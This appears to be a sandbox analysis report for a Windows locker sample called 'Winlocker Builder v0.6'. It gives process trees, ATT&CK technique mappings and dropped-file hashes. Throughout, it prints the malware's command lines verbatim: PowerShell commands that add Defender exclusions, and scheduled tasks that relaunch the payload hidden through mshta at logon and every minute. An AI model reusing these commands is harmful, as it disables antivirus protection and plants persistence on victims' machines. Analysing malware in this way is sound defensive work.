PID 8 wrote to memory of 2868	8	Winlocker Builder v0.6.exe	99
PID 8 wrote to memory of 2868	8	Winlocker Builder v0.6.exe	99
PID 2200 wrote to memory of 3276	2200	rundll32.exe	100
PID 2200 wrote to memory of 3276	2200	rundll32.exe	100
PID 3196 wrote to memory of 3996	3196	control.exe	102
PID 3196 wrote to memory of 3996	3196	control.exe	102
PID 3996 wrote to memory of 3632	3996	rundll32.exe	105
PID 3996 wrote to memory of 3632	3996	rundll32.exe	105
PID 3996 wrote to memory of 1560	3996	rundll32.exe	107
PID 3996 wrote to memory of 1560	3996	rundll32.exe	107
PID 3996 wrote to memory of 1720	3996	rundll32.exe	110
PID 3996 wrote to memory of 1720	3996	rundll32.exe	110
PID 2868 wrote to memory of 3080	2868	Winlocker Builder v0.6.exe	114
PID 2868 wrote to memory of 3080	2868	Winlocker Builder v0.6.exe	114
PID 2868 wrote to memory of 3120	2868	Winlocker Builder v0.6.exe	115
PID 2868 wrote to memory of 3120	2868	Winlocker Builder v0.6.exe	115
PID 3080 wrote to memory of 1580	3080	control.exe	116
PID 3080 wrote to memory of 1580	3080	control.exe	116
PID 1580 wrote to memory of 4220	1580	rundll32.exe	117
PID 1580 wrote to memory of 4220	1580	rundll32.exe	117
PID 1580 wrote to memory of 4980	1580	rundll32.exe	120
PID 1580 wrote to memory of 4980	1580	rundll32.exe	120
PID 1580 wrote to memory of 2084	1580	rundll32.exe	122
PID 1580 wrote to memory of 2084	1580	rundll32.exe	122
PID 3120 wrote to memory of 4672	3120	Winlocker Builder v0.6.exe	125
PID 3120 wrote to memory of 4672	3120	Winlocker Builder v0.6.exe	125
PID 3120 wrote to memory of 4976	3120	Winlocker Builder v0.6.exe	126
PID 3120 wrote to memory of 4976	3120	Winlocker Builder v0.6.exe	126
PID 4672 wrote to memory of 4616	4672	control.exe	127
PID 4672 wrote to memory of 4616	4672	control.exe	127
PID 4616 wrote to memory of 4632	4616	rundll32.exe	128
PID 4616 wrote to memory of 4632	4616	rundll32.exe	128
PID 2968 wrote to memory of 3632	2968	explorer.exe	131
PID 2968 wrote to memory of 3632	2968	explorer.exe	131
PID 4616 wrote to memory of 4080	4616	rundll32.exe	133
PID 4616 wrote to memory of 4080	4616	rundll32.exe	133
PID 2968 wrote to memory of 388	2968	explorer.exe	135
PID 2968 wrote to memory of 388	2968	explorer.exe	135
PID 2968 wrote to memory of 8	2968	explorer.exe	138
PID 2968 wrote to memory of 8	2968	explorer.exe	138
PID 4616 wrote to memory of 2892	4616	rundll32.exe	140
PID 4616 wrote to memory of 2892	4616	rundll32.exe	140
PID 2968 wrote to memory of 3076	2968	explorer.exe	142
PID 2968 wrote to memory of 3076	2968	explorer.exe	142
PID 4976 wrote to memory of 1216	4976	Winlocker Builder v0.6.exe	144
PID 4976 wrote to memory of 1216	4976	Winlocker Builder v0.6.exe	144
PID 4976 wrote to memory of 4508	4976	Winlocker Builder v0.6.exe	145
PID 4976 wrote to memory of 4508	4976	Winlocker Builder v0.6.exe	145
PID 1216 wrote to memory of 1168	1216	control.exe	146
PID 1216 wrote to memory of 1168	1216	control.exe	146
PID 2968 wrote to memory of 4244	2968	explorer.exe	147
PID 2968 wrote to memory of 4244	2968	explorer.exe	147

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
"C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796
- C:\Windows\System32\control.exe
  "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:796
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    - Checks computer location settings
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1124
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3572
  - - C:\Windows\system32\SCHTASKS.exe
      SCHTASKS.exe /RUN /TN "WinLocker"
      4⤵
      PID:3276
- C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
  "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:8
- - C:\Windows\System32\control.exe
    "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3196
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
      4⤵
      Modifies visiblity of hidden/system files in Explorer
      Checks computer location settings
      Loads dropped DLL
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3996
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3632
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1560
    - - C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        5⤵
        
        PID:1720
- - C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
    "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2868
  - - C:\Windows\System32\control.exe
      "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3080
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Checks computer location settings
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1580
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4220
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4980
      - C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        6⤵
        
        PID:2084
  - - C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
      "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
      4⤵
      Checks computer location settings
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3120
    - - C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4672
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        6⤵
        Modifies visiblity of hidden/system files in Explorer
        Checks computer location settings
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4632
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4080
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        7⤵
        
        PID:2892
    - - C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4976
      - C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1216
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        7⤵
        Modifies visiblity of hidden/system files in Explorer
        Checks computer location settings
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1912
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5112
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        8⤵
        
        PID:3816
      - C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        6⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4508
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        7⤵
        
        PID:2196
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        8⤵
        Modifies visiblity of hidden/system files in Explorer
        Checks computer location settings
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:3120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3452
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1840
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        9⤵
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        7⤵
        Checks computer location settings
        Modifies registry class
        
        PID:2056
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        8⤵
        
        PID:2512
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        9⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:3704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4796
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4980
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:2196
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        10⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        8⤵
        
        PID:924
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        9⤵
        
        PID:4604
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        10⤵
        
        PID:4412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2496
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3924
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        11⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        9⤵
        
        PID:2548
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        10⤵
        
        PID:2340
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        11⤵
        
        PID:1444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2176
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:656
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        12⤵
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        10⤵
        
        PID:4576

C:\Windows\system32\mshta.exe
"mshta.exe" vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:2624

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
1⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\explorer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\explorer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:8
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3076
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Public\explorer.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4244

C:\Windows\system32\mshta.exe
"mshta.exe" vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:4484

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
- System Location Discovery: System Language Discovery
PID:4188

C:\Windows\system32\mshta.exe
"mshta.exe" vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:3276

C:\Windows\system32\mshta.exe
"mshta.exe" vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:4400

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3276

C:\Windows\system32\mshta.exe
"mshta.exe" vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:3932

C:\Windows\system32\mshta.exe
"mshta.exe" vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:4320

C:\Windows\system32\mshta.exe
"mshta.exe" vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:228

C:\Windows\system32\mshta.exe
"mshta.exe" vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Winlocker Builder v0.6.exe.log

Filesize
1KB

MD5
9063108404ce873a63f55b85fc0279d7

SHA1
4f882eed1f0ba768ae3e66e22aca9f5dfac5dfb9

SHA256
250e4fa65135df1df0158f86699ff4520f1fd15c61ffab22f7a4cb62198e8d01

SHA512
6ec3db7405b3c0530a23904a09ea53c67253048f13d8ea2a427663e7c8269c22166eebd725917935ce9f5441c807f5ab006094fa180b84468fd8743a3b228bb8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rundll32.exe.log

Filesize
1KB

MD5
5ac1ab46f3401c70bd97b9f0a5ece605

SHA1
244bdb874862a657da1718e7fcc9adfd94bd13c6

SHA256
667b155a080c9d199c4fd9880cc7556e540e5e067b138b1df678ec9cd1eba077

SHA512
14e2dd1a3d25030a7a0c9069918ecddd2a11aa495b916ba86a43dc2365dd606996895147099dd54c787a5c0d948a63c754bc9e4153059f8f1b20db4caaa599cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.bin

Filesize
414KB

MD5
ab79489e9704fc9cc9d8bee4f8e17ec5

SHA1
b2e19a89b43d537bb5b02ee9ca2418f027259c1e

SHA256
4d71760d6f3159849068b635ab4c39b9b747d899f03670533971a62d262c264e

SHA512
60d11ee023b9a045c4b59b88311f001fcf4856e27837a1ffd6ecab0203e5199ee077d85c5217e0f0b94e0bff93b14c3680816b6fbf9d42ee2eff5c23d9a13edd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cd3ff24033bcac59bacd562de7e8f81e

SHA1
eb9bf2d35583075801c7faf9705f5bcfea9b9cda

SHA256
786ab4b8f344487365ba7e3bbe4ea8a2e310a25a42a5c579dd647b807d8e3875

SHA512
9b86fd5d942fb9031a87bfc4c552fc1286b72e53da43b2cb6e256c9332c3310f92453e04779a0d95a29201d8b90c7b043b754e1f43ea30f4176191e8050e946a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a5b65e48f20a79f06b30ca3020df0ce3

SHA1
55a2263b4bb9e5576e798d4ff0fb1e6d7bfa88cf

SHA256
0cd9d3dcec93fe4ae156a9975a9c553f6adfe8be51b1a9a9f7087b7a1424fe6e

SHA512
27fb7f3b0bc10dd9de982fe4f4b790aa33687af6e780ab454e87be1caf4607001cf2e5dd90a69a379364149ae30e7109ec6043298703e1f05beaf212f36e5b98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
38683f1025eea0c5de8c9812dbc1b76e

SHA1
057117e5e316340d80a16cb7dfccfb63fc037326

SHA256
a4f240728db99824d155a7aa23daa1c143dabf65e8466d3e254917d3f97bfd83

SHA512
89d901626796ab9d5a9972798307eaf5d3b33c718fac63ce93d8b4006f8953764168a3f1cb8adcfb54aac58631a6cf375bc96ef5fcfa0d84a794e4153b67fc86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a139f7027af21b23ce1c8d14dd641729

SHA1
3f4f09bf5c111347a40a8c3e1069efe200ea561a

SHA256
ac1816b3fd0af6542939a698b31b748a6e11976d2544618c2a3adb7b3b551fa2

SHA512
1f7a0a08d86f34c14b73bc70dc9d3ed459d88eda0cf0b02a0ad243ebbfc07b2e6b292497e1e749e57a4c2927e5f910a959202dd9ed454d333a7142fe03e40a31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c7624ea88261de9d6055d4bc1088cecf

SHA1
e936415ac7081f46cf77c396a913265029642c70

SHA256
352e450eaaf22e12faa13843c7c74769faff177611b6078cb9c1830855ce6f67

SHA512
37826824edc629cece6a853a8003cd1c7bd201eb4677de8a1d84801ec8cf1d4f7bdf793ab6308212ccbf67e235dbcee5d72774e0f97558b72d348c8d8d5e022f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1976725abe4c9a3b4135f6bf1ceba480

SHA1
7eeef4e41627e5f4f3a59f4ff7f4a0941676ca90

SHA256
0af85e5612ffbe8e67e6e712aff8cb13079cb3c33b908d30ef49a192c43dcd84

SHA512
5aa8645026b3e387cfc80445872bfcaf10fc28cd5e8bab3137624cc70caa72be28abde5a57421580f69eb9cf8c56dd04761247c4e23d8f87a9879b07fc17deba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c382cfe6eddf5d4de691183138df00e9

SHA1
1af9566f328e6d0d4e5597c5a528c5505a6a3dc7

SHA256
fe19995abc1b313c9c9ef439f3cd81f79d17d75bf40060f58a8b405223baed52

SHA512
ddc0a79f86e2f7e9e0109c979fad86468307e2d2eaf8efab91b33c4a707df0b70da77e8d3b0f270d8047312d15e00c84b2a0bca72238273898880014d1e08073

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ebbb6601982de03c0e467092dcea244

SHA1
2618ea8bde543047063e8c222fc28069a2257912

SHA256
8985c0a0e906b970e974f2841ff37489f37f5a029cab6b9e1a86eda6406a0c45

SHA512
06aee5ff109b3ca33aab7fd33647ce8935ee04884c7115d7902c91376ca45ccfad4f63ae0184901c5cddf67f1759a2798e49a3744a81d794bd5b075b272e2721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f8ab8cbb95882e0d02631f8c0aeb5ee8

SHA1
34b7228553cc826b61e71cceb13df092a016fc99

SHA256
